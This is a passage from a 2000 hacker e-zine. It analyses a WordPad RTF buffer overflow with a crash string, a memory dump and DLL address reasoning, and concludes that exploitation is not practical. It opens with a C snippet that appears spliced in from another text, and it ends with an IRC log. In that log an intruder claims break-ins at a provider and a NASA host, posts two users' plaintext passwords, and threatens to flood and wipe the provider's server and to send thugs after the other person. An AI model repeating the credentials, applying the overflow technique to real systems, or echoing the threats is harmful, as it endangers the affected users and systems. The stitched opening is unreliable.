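    char buf[KW_BUF_SIZE];
    const char *kw = strrchr(rtf, '\\');
    if (kw == NULL) return 0;
    if (copy_keyword_safe(buf, sizeof buf, kw + 1, rtf + strlen(rtf)) != 0) return 0;
    return strcmp(buf, expected) == 0;
}
```

With 35 letters the NUL lands on the last local and nothing else moves; with 36 it zeroes the low byte of the saved EBP (0012F1E0 becomes 0012F100), and with 44 the saved EBP and return address become 'jjjj' and 'kkkk', exactly the three outcomes traced above.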
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAA(more As)}

'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After the overwritten return address, we have more As.

0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 70707070 71717171 61616161 iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................

At 0012F2AC we have a pointer to the current character in the file buffer. ECX is saved to this location (referenced as esi+1C) before the copying, and restored afterwards. This value is updated after every copied byte. If we overwrite it, it will start pointing to a new memory location. The copy loop will try to read the bytes to copy from there and probably crash. Even if we somehow manage to overwrite this with a valid memory pointer, this will be the last byte copied from our string. This limits us to 216 'A's after the 'jjjjkkkk'.

III. Is an exploit possible?

Exploiting this buffer overflow will be hard. Maybe not impossible, but very hard.
We have only 216 bytes to squeeze our shellcode in, and we can use 26 characters - the letters from 'a' to 'z'. Writing shellcode with no nulls is hard, writing one only with letters is almost impossible. First, we need some way of pointing the return address to something useful. We cannot point it to the stack, because the stack address contains 'prohibited' characters. After the RET instruction the ESP points to the second part of our string (the one after 'jjjjkkkk'). We need a JMP ESP or CALL ESP instruction. The usual approach is to look at the loaded DLLs at the time of the crash and to find one of these instructions at some memory location. Then we can point the return address to this memory location and have it jump back to our shellcode. The problem is that we need the address of this memory location to consist only of lowercase letters.

c:\>listdlls.exe wordpad

ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com

------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
Base        Size      Version         Path
0x029a0000  0x34000   4.00.1381.0096  C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000  0x5e000   4.00.1381.0174  C:\WINNT\System32\ntdll.dll
0x5f800000  0xee000   4.21.0000.7160  C:\WINNT\System32\MFC42u.DLL
0x78000000  0x40000   6.00.8397.0000  C:\WINNT\system32\MSVCRT.dll
0x77f00000  0x5e000   4.00.1381.0178  C:\WINNT\system32\KERNEL32.dll
0x77ed0000  0x2c000   4.00.1381.0115  C:\WINNT\system32\GDI32.dll
0x77e70000  0x54000   4.00.1381.0133  C:\WINNT\system32\USER32.dll
0x77dc0000  0x3f000   4.00.1381.0203  C:\WINNT\system32\ADVAPI32.dll
0x77e10000  0x57000   4.00.1381.0193  C:\WINNT\system32\RPCRT4.dll
0x77d80000  0x32000   4.00.1381.0133  C:\WINNT\system32\comdlg32.dll
0x70970000  0x1a8000  4.72.3110.0006  C:\WINNT\system32\SHELL32.dll
0x70bd0000  0x44000   5.00.2314.1000  C:\WINNT\system32\SHLWAPI.dll
0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll
0x77b20000  0xb6000   4.00.1381.0190  C:\WINNT\system32\ole32.dll
0x76aa0000  0x6000    4.00.1371.0001  C:\WINNT\System32\INDICDLL.dll
0x77c00000  0x18000   4.00.1381.0027  C:\WINNT\System32\WINSPOOL.DRV
0x775a0000  0x14000   0.02.0000.0000  C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000  0x2e000   4.00.0993.0004  C:\WINNT\System32\RICHED32.dll
0x70400000  0x77000   5.00.2314.1000  C:\WINNT\System32\mlang.dll

These are the loaded DLLs that we can use. The perfect DLL would be the same on Windows 95, 98, SE, NT 4 with all service packs and on Win2K. Unfortunately such a DLL is just a dream. Our choices are really limited. Looking at the base addresses, we can eliminate most of the DLLs, because they don't have letter addresses. This leaves us with only one DLL that we can use:

0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll

We can only use the code in the range from 71616161 to 7161707A. After disassembling the DLL and looking at the code, we clearly see that there is no JMP ESP or CALL ESP instruction. There is no way to execute the shellcode. Even if we could do it, making the shellcode do something useful would be a pain in the ass. The restrictions are too harsh. After the RET instruction, at ESP-50 we have a pointer to the beginning of the buffer, where the raw file is loaded. This buffer holds the raw file contents, so we can use NULLs and non-letter characters. Unfortunately, this buffer is in the heap and we can not execute any code from there. We need to copy the code to the stack first. The whole situation sucks. At least the Micro$oft users are saved once again! But not for long :-)

Solar Eclipse (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
"first I flood the provider, then I wipe it"
Anonymous
........... . . . . . . . . . . . . . .

Session Start: Wed Jan 05 13:21:29 2000
Session Ident: MOONSPELL (~darkstar@193.193.163.224)
<MOONSPELL> where are you from?
<MOONSPELL> do you have a connection with iterra ent?
<ilia20> I do
<ilia20> :)
<ilia20> from sofia
<ilia20> I am
<MOONSPELL> are you the admin?
<ilia20> no
<ilia20> why?
<ilia20> I'm an acquaintance of the boss
<MOONSPELL> tell the boss to stop the accounts with users martinku and dashinov
<MOONSPELL> because through them scanning is going on and NASA is being entered
<ilia20> how does one get into nasa, man? :)
<MOONSPELL> pcnnfs
<ilia20> or is that nasa some router/server?
<MOONSPELL> codonicprint.jpl.nasa.gov
<MOONSPELL> this one is broken into with an iterra acc
<ilia20> really
<ilia20> are you in NASA?
<MOONSPELL> your provider will have trouble if NASA sniffs out where the logins came from
<ilia20> are you a cosmonaut or what? :))
<MOONSPELL> no, I'm just hacking it too
<ilia20> and how do you know it's so?
<ilia20> aha
<ilia20> and why do you think the server was hacked through these iterra accounts?
<MOONSPELL> because I was going through there
<ilia20> you had the accounts?
<MOONSPELL> I hacked your provider, and only these users had an easy password for john
<MOONSPELL> dashinov:irin@
<MOONSPELL> martinku:bemyheroine
<ilia20> so what?
<ilia20> it could have been another user
<MOONSPELL> I'm just telling you, change the passwords, or I'll wipe your whole dial-up server so that you get the message
<ilia20> oh, now we've started threatening too :-)))
<ilia20> why are you so hostile towards iterra?
<MOONSPELL> bye, I'm off to administer my server at netbg
<ilia20> by the way which town are you from? do you know a certain raicho from pleven?
<ilia20> ok
<ilia20> if that's what you're into
<ilia20> :)
<MOONSPELL> because it's a lame provider
<ilia20> aha
<MOONSPELL> say what?
<ilia20> what should I tell you
<MOONSPELL> I'm on linux
<ilia20> being on linux doesn't make you 100 kilos
<MOONSPELL> but it seems you want a flood on iterra, is that how I should take it? :)))
<MOONSPELL> the filter at Orbitel won't help you much :)
<ilia20> I want to tell you just 1 thing:
<ilia20> there are 2 kinds of hackers
<ilia20> the 1st
<ilia20> are the decent hackers
<ilia20> they hack
<ilia20> learn new things
<ilia20> etc
<ilia20> and generally don't cause problems
<ilia20> such people even drive progress
<ilia20> and the 2nd kind of hackers
<ilia20> are shitheads
<ilia20> who
<ilia20> are full of complexes and losers in life
<ilia20> that is, failures
<ilia20> and they vent their complexes and whatnot
<ilia20> they make threats
<ilia20> intimidate
<ilia20> etc
<ilia20> judge for yourself which kind you are
<MOONSPELL> I know I'm the second kind:)))
<MOONSPELL> first I flood the provider, then I wipe it
<MOONSPELL> and after that go and sort yourself out
<ilia20> after that your head will be broken
<ilia20> until you come to your senses
<MOONSPELL> there's no way they can catch me :)))
<ilia20> whoever has thought himself great has been mistaken
<ilia20> there is always a way
<ilia20> for everything
<MOONSPELL> well, find me and you'll be the one who gets beaten, because there are people to protect me
<ilia20> hehehe
<ilia20> :-))))
<MOONSPELL> true, there are few people in the Vitosha district, but at least I know a few thugs and I have their mobile numbers
<ilia20> four-eyes
<ilia20> you're trying to scare me with thugs, man?
<ilia20> haha
<ilia20> what kind of man are you?
<ilia20> in my opinion there's something seriously wrong in your head
<ilia20> hardware bug
<ilia20> :)))))
<ilia20> ok ciao, I've got things to do too
Session Close: Wed Jan 05 14:08:29 2000
EOF